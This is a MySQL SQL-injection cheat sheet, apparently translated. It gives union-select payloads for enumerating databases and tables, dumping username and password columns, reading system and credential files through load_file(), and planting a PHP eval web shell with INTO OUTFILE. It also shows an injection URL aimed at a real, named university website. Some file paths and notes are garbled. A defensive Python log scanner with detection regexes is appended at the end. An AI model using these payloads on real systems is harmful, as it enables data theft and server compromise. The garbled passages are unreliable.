Determine the number of columns
Order by num/*
Match the column count
and 1=1 Union Select 1,2,3,4,5.......n/*
Find which column positions are displayed
and 1=2 Union Select 1,2,3,4,5.....n/*
Using built-in functions to reveal database information
version(), database(), user()
Database information without having to guess the usable columns (does not work on some sites):
and 1=2 UNION ALL Select Version ()/*
and 1=2 UNION ALL Select Database ()/*
and 1=2 union ALL Select User ()/*
Operating System Information:
and 1=2 UNION ALL SELECT @@global.version_compile_os from mysql.user/*
Database permissions:
and Ord (User (), 1, 1)) =114/* If the page returns normally, the user is root
Enumerating databases (MySQL > 5.0)
MySQL 5 and above has the built-in information_schema database, which stores the structure information for all MySQL databases and tables
and 1=2 Union select 1,2,3,schema_name,5,6,7,8,9,10 from information_schema.schemata limit 0,1
Enumerating tables
and 1=2 Union select 1,2,3,table_name,5,6,7,8,9,10 from information_schema.tables where table_schema=[database name in hex] limit 0,1
(In limit 0,1 the 0 is the starting record, with 0 being the first record, and the 1 means one record is shown.)
Enumerating columns
and 1=2 Union select 1,2,3,column_name,5,6,7,8,9,10 from information_schema.columns where table_name=[table name in hex] limit 0,1
Extracting passwords
And 1=2 Union Select, username column, 5,6,7, password column, 8,9 from table name limit 0,1
Advanced usage (one usable column displays two pieces of data):
Union Select 1,2,3concat (username column, 0x3c, password column), 5,6,7,8,9 from table name limit 0,1
Writing a web shell directly (root privilege)
Conditions:
1. The site's physical path is known
2. Sufficient privileges (can be tested with select .... from mysql.user)
3. magic_quotes_gpc = off
Select ' <?php eval ($_post[cmd])?> ' into outfile ' physical path '
and 1=2 union ALL Select a sentence hex value into outfile ' path '
load_file() common paths:
1. replace (Load_file (0x2f6574632f706173737764), 0x3c,0x20)
2. replace (Load_file (char (47,101,116,99,47,112,97,115,115,119,100)), char (32), Char
The two forms above display the full source of a PHP file. If certain characters are not replaced (for example "<" replaced with a space), the result is rendered as a web page and the code cannot be seen.
3. load_file (char (47)) lists the root directory on FreeBSD and SunOS systems
4. /etc tpd/conf tpd.conf or /usr/local/apche/conf tpd.conf: Apache virtual host configuration file on Linux
5. C:\Program Files\apache group\apache\conf \httpd.conf or C:\apache\conf \httpd.conf: Apache configuration file on Windows
6. c:/resin-3.0.14/conf/resin.conf: Resin configuration for a site developed in JSP
7. c:/resin/conf/resin.conf /usr/local/resin/conf/resin.conf: JSP virtual host configuration on Linux
8. d:\APACHE\Apache2\conf\httpd.conf
9. C:\Program Files\mysql\my.ini
10. ../themes/darkblue_orange/layout.inc.php: phpMyAdmin path disclosure
11. C:\windows\system32\inetsrv\MetaBase.xml: IIS virtual host configuration file
12. /usr/local/resin-3.0.22/conf/resin.conf: Resin configuration file for version 3.0.22
13. /usr/local/resin-pro-3.0.22/conf/resin.conf: same as above
14. /usr/local/app/apache2/conf/extra tpd-vhosts.conf: Apache virtual host configuration
15. /etc/sysconfig/iptables: firewall policy
16. USR/LOCAL/APP/PHP5 B/php.ini: PHP settings
17. /etc/my.cnf: MySQL configuration file
18. /etc/redhat-release: Red Hat system version
19. C:\mysql\data\mysql\user.MYD: stores the MySQL user passwords
20. /etc/sysconfig/network-scripts/ifcfg-eth0: IP configuration
21. /USR/LOCAL/APP/PHP5 B/php.ini: PHP-related settings
22. /usr/local/app/apache2/conf/extra tpd-vhosts.conf: virtual site settings
23. C:\Program Files\rhinosoft.com\serv-u\servudaemon.ini
24. C:\windows\my.ini
25. C:\Boot.ini
Common website configuration files: config.inc.php, config.php. Use load_file() together with replace (Load_file (HEX), char (32))
Note:
Char denotes <
Char (+) denotes a space
Problems with manual injections:
When the page shows the following error after injection:
Illegal mix of collations (latin1_swedish_ci,implicit) and (utf8_general_ci,implicit) for operation ' UNION '
such as:Http://www.mse.tsinghua.edu.cn/mse/research/instrument.php?ID=13%20and%201=2%20union%20select%201,load_ File (0x433a5c626f6f742e696e69), 3,4,user ()%20
This is caused by inconsistent character encodings between the two sides of the UNION.
Workaround: wrap the parameter in unhex (Hex (parameter)). The URL above can be changed to:
Http://www.mse.tsinghua.edu.cn/mse/research/instrument.php?ID=13%20and%201=2%20union%20select%201,unhex (Hex ( Load_file (0x433a5c626f6f742e696e69)), 3,4,unhex (Hex (User ()))%20
You can continue to inject ...
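A defender-side counterpart to the statements above, as an added example that is not part of the original page: a Python access-log filter that decodes each request's query string and reports which stage of this walk-through it resembles. The rule names, the /item.php endpoint and the log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# One rule per stage of the walk-through above (names are this example's own).
RULES = {
    "column-count probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "fingerprint function": re.compile(r"\b(?:version|database|user)\s*\(\s*\)|@@\s*\w+", re.I),
    "schema enumeration": re.compile(r"\binformation_schema\s*\.", re.I),
    "file read": re.compile(r"\bload_file\s*\(", re.I),
    "file write": re.compile(r"\binto\s+(?:out|dump)file\b", re.I),
    "collation workaround": re.compile(r"\bunhex\s*\(\s*hex\s*\(", re.I),
}
REQUEST = re.compile(r'^(\S+) .*?"[A-Z]+ (.+?) HTTP/[\d.]+"')

def normalize(query):
    """Decode twice (catches %2520), drop /*...*/ padding, collapse spaces."""
    text = unquote_plus(unquote_plus(query))
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.S)
    return re.sub(r"\s+", " ", text)

def classify(target):
    """Names of the rules matched by the query string of a request target."""
    query = normalize(urlsplit(target).query)
    return [name for name, rx in RULES.items() if rx.search(query)]

def scan(log_lines):
    """Return (client_ip, matched_rules) for each log line that matches a rule."""
    hits = []
    for line in log_lines:
        m = REQUEST.match(line)
        if m and (rules := classify(m.group(2))):
            hits.append((m.group(1), rules))
    return hits

# Constructed access-log lines (documentation IPs, hypothetical /item.php).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /item.php?id=13 HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /item.php?id=13%20order%20by%2010/* HTTP/1.1" 200 498',
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /item.php?id=13%20and%201=2%20union%20select%201,unhex(hex(user())),3 HTTP/1.1" 200 530',
    '203.0.113.9 - - [01/Jan/2024:10:00:14 +0000] "GET /item.php?id=13+and+1=2+union/**/select+1,table_name,3+from+information_schema.tables HTTP/1.1" 200 541',
    '198.51.100.4 - - [01/Jan/2024:10:01:00 +0000] "GET /search.php?q=order+by+phone HTTP/1.1" 200 777',
]

if __name__ == "__main__":
    for ip, rules in scan(SAMPLE_LOG):
        print(ip, rules)
```

Access logs carry only the request line, so parameters sent in POST bodies need the same rules applied at the application or WAF layer.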